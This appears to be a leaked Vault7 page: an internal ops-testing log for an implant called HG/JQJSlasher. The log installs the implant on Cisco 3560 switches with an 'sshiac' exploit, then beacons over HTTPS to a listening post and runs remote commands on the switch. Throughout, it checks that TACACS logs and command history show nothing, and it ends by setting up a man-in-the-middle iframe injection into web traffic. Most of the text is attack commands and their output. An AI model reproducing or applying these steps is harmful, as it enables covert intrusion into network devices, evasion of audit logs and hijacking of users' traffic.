Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #1179928
JQJSlasher - Ops Testing
Cisco - 3560 IP:192.168.200.10
ICON-CT: 172.20.12.29 / Seeds Host 192.168.32.10 - VLAN32
Testing to focus on the following capabilities:
- Install
- Trigger
- Shell access
- MITM iFrame injectionSmoke Test Install / Functionality test
- Install HG (no AAASecurity Server from Cisco) / Set up basic comms with implant
- Un-tar delivery to ICON: /home/user1/slasher-2h_20150725/bin/ops/slasher-2h/
- Change ../slasher-2h/remote/data/config/npc3/target.py interPacketTime to 0.1 seconds
- nano ../ops/slash/slasher-2h/hg/slasher-2h.txt
- Change Interface = eth0
- Change Trigger address = 192.168.32.10 (Seeds host)
- Attack w/ SSHIAC from ICON: ./sshiac --ip 192.168.200.10:22 --l cisco:cisco password
-
LG
EC -125
DH
EC -60EC -159
M
-
- #cd ../../remote/
- source aliaeses
- remote>broad
- ./seq set 1
- remote>broad = GOOD - status OK
- nano target-aliases
- Change target ip = 192.168.200.10
- ProcID = 0x10423185
- Ran: ../slasher-2h/hg# ./prep-ct.sh
- = "File copy complete. CutThroat is ready for use."
- remote>hg_start
- = done, GOOD - status OK
- Result: 0xfffffffb (on 3560-24 #1 - stopped testing and tried 2nd switch from step 5)
- Result: 0x00000001 (on 2nd 3560-24)
- Make listen window:
- ./cutthroat ilm_hg.so
- ilm listen slasher-2h.txt
- Make trigger window:
- ./cutthroat ilm_hg.so
- ilm trigger slasher-2h.txt
- beacon call_base_back https 172.20.12.29 443
- SSL Handshake completes in listen window
-
Test basic functionality of initial install
- In listen window> modeule show
- = All modules running after initial install
- = All commands tab out
- In listen window> modeule show
-
Test HG Install with AAASecurity Server from Cisco configured similar to target device
- Configure 3560 with AAASecurity Server from Cisco settings from target config
- Save config and reload 3560 target to start with a clean switch
- Test ssh to confirm AAASecurity Server from Cisco works natively:
- ssh -l root 192.168.200.10
- password: password
- >en = password
- = successful login
- ssh -l root 192.168.200.10
- Attack with SSHIAC
-
./sshiac --ip 192.168.200.10:22 --l root:password password
LG
EC -122
E gs failed
E
-
./sshiac -c --ignor --ip 192.168.200.10:22 --l root:password password
-
BUILD NUMBER: SSH-415-P
username: larry
password: password
enable: password
IP: 192.168.200.10:22
ignore loggingpress ENTER to continue or Ctrl-c to stop
LG
EC -122
E gs failed
E
-
./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 --l root:password password
-
./sshiac --ip 192.168.200.10:22 --l root:password password
BUILD NUMBER: SSH-415-P
username: root
password: password
enable: password
IP: 192.168.200.10:22
verbose
debug
force enable mode
ignore logging
press ENTER to continue or Ctrl-c to stop
L
3560-target>
3560-target>
3560-target>en
Password:
3560-target#term len 0x0
3560-target#term width 0
3560-target#show proc | i Virtual Exec|SSH
89 M* 0 378 171 2210 9728/12000 1 SSHSecure Shell Process
270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle
3560-target#
3560-target>
3560-target>
3560-target>en
Password:
3560-target#show region
Command authorization failed.
3560-target#term len 0
3560-target#show proc | i Virtual Exec|SSH
89 ME 2462A4 496 172 2883 9728/12000 1 SSHSecure Shell Process
266 M* 0 370 169 2189 9724/12000 2 SSHSecure Shell Process
270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle
3560-target#Gshow users | i \*
* 2 vty 1 root idle 00:00:00 172.20.12.29
3560-target#show ver | i IOS\ |BOOTLDR:
Cisco IOSApple operating system for small devices Software, C3560 Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE, RELEASE SOFTWARE (fc2)
BOOTLDR: C3560 Boot Loader (C3560-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
3560-target#show stacks 266
Command authorization failed.
3560-target#
EC -122
E gs failed
exitexit
E
**********************************************************************
Thursday 8/6/15 - User #77424 Testing
*Unsure where exactly where User #? left off, reloaded the 3560, attempted to re-attack
- SSHIAC attack
- Result w/no flags:
ttack/linux$ ls sshiac user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac --ip 192.168.200.10:22 -l cisco:cisco password L ECEdgeCase -76
EC -129 E user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$
-
Result with flags:
user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 -l cisco:cisco password BUILD NUMBER: SSH-415-P
username: cisco password: cisco enable: password IP: 192.168.200.10:22 verbose debug force enable mode ignore logging
press ENTER to continue or Ctrl-c to stop
L ECEdgeCase -76
EC -129 E
-
Result when not being stupid and using the right username / password:
root@slasher-icon:/home/user1/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux# ./sshiac -v -d --forceenable --ignorelog --ip 192.168.200.10:22 --l root:password password BUILD NUMBER: SSH-415-P
username: root password: password enable: password IP: 192.168.200.10:22 verbose debug force enable mode ignore logging
press ENTER to continue or Ctrl-c to stop
EC -60
EC -159 exit M
- Result w/no flags:
-
Successfully used Remote to install HG:
-
Set sequence number and broad: [target:192.168.200.10] remote> ./seq set 1 608 -> 1 [target:192.168.200.10] remote> broad
-
GOOD - status OK. OP: BROADCAST Target NEXT -->2<-- IACInternational Access Code Software Version 41.5 (Arch: PPCPowerPC (IBM)) Target Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE
Proc ID: 0x10423191 Next Sequence: 0x2
-
-
[target:192.168.200.10] remote> hg_start
GOOD - status OK. OP: RUNCODE using Per Second Code address: 0x03287d98 No data Result: 0x00000001
-
- NOTE - Recreated User #?'s steps 6-8 from above, no need to list it all out
************************************************************************************
Friday 8/7/15
Installed 3560-48port in place of 24-port target switch above. Loaded 12.2(37) SE IOSApple operating system for small devices on it and copied over previous config.
- Attacked 3560-48TS-S without AAASecurity Server from Cisco configured on switch successfully ./sshiac -v -d --confirm --forceenable --ignorlog --ip 192.168.200.10:22 --l cisco:cisco password
- = all modules up and running after installing HG and getting comms.
- Configured AAASecurity Server from Cisco on target 3560-48TS-S switch just as the target config is configured.
- Tried several syntaxes of ./sshiac, however, the only one that worked was as follows:
- ./sshiac -c --ignor --ip 192.168.200.10:22 root:password password
-
BUILD NUMBER: SSH-415-P
username: root
password: password
enable: password
IP: 192.168.200.10:22
ignore loggingpress ENTER to continue or Ctrl-c to stop
LG
EC -125
DH
EC -60EC -159
M
-
- cd ../../remote/
- Prior to HG install, target CPU= 60s - 5% w/ 35% spike, 60min - 5% w/ 35% spike, 72hrs - 35% average with 70% spikes
- source aliaeses
- remote>broad
- ./seq set 1
- remote>broad = GOOD - status OK
- nano target-aliases
- Change target ip = 192.168.200.10
- ProcID = 0x13022407
- >hg_start, CPU = 60s - 21% spike
-
Show Memory on target:
Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
Processor 20BE480 91495296 20857396 70637900 69931132 69881184
I/O 7800000 8380416 3587852 4792564 4711952 4791152
Driver te 1400000 1048576 44 1048532 1048532 1048532
- No additional logs, No additional commands in "show history", No logs on TACACS+ for "root"
- In listen window on ICON> ./cutthroat ilm_hg.so
- ilm listen slasher-2h.txt = Listening for clients on port 443
- In trigger window on ICON> ./cutthroat ilm_hg.so
- ilm trigger slasher-2h.txt
- >beacon call_base_back https 172.20.12.29 443
- Listen window does SSLSecure Socket Layer handshake to establish comms
- In Listen window - >module show = all modules running
-
HG Listen> modeule start FilterBroker.mod
- modeule show = FilterBroker running
-
HG Listen> module start default:ACEMod.mod
- module show = ACEApplication Control Engine (Module) running
- ./sshiac -c --ignor --ip 192.168.200.10:22 root:password password
- Tried several syntaxes of ./sshiac, however, the only one that worked was as follows:
-
Run series of ACEApplication Control Engine (Module) exec (shell) commands from HG listen window
- HG Listen> cmd exec "show run"
- HG Listen> cmd exec "sh config"
- HG Listen> cmd exec "sh vlan"
- HG Listen> cmd exec "sh user"
- HG Listen> cmd exec "dir flash"
- HG Listen> cmd exec "sh clock"
- Enter a native command that requires a series of commands:
- HG Listen> cmd exec "sh ip int br"
- HG Listen> cmd exec "sh configuration id"
- HG Listen> cmd exec "sh dhcp server"
- HG Listen> cmd exec "sh int switch"
- HG Listen> cmd exec "sh int counters"
- HG Listen> cmd exec "sh int counters errors"
- HG Listen> cmd exec "sh int accounting"
- HG Listen> cmd exec "sh int irb"
- HG Listen> cmd exec "sh int mtu module 1"
- HG Listen> cmd exec "traceroute 1.1.1.1" = success, with traceroute output
- HG Listen> cmd exec "ping 1.1.1.1" = success with round trip statistics
- HG Listen> cmd exec "traceroute 3.3.3.3" = successful in that output shows to a destination that cannot be reached
- HG Listen> cmd exec "ping 3.3.3.3" = successful in that out put of 0 replies is received
- Execute invalid commands and verify they fail gracefully:
- HG Listen> cmd exec "show test"
- HG Listen> cmd exec "sh home"
- HG Listen> cmd exec "traceroute 3.3.3.3"
- ssh back to target 3560 and confirm that Tacacs logs the connection. Run "sh history" and verify no commands executed via HG show.
- SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
- Did not test module persistence
- HT Listen> mitm create http_iframe 192.168.21.10 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
- >mitm show = confirms rule is active
- Clear browsing history on target host
- Browse to X.X.X.XX (LVLT-GOGL-8-8-8[US]) --> receive normal web page
- Iframe is injected into web page, viewed in source URL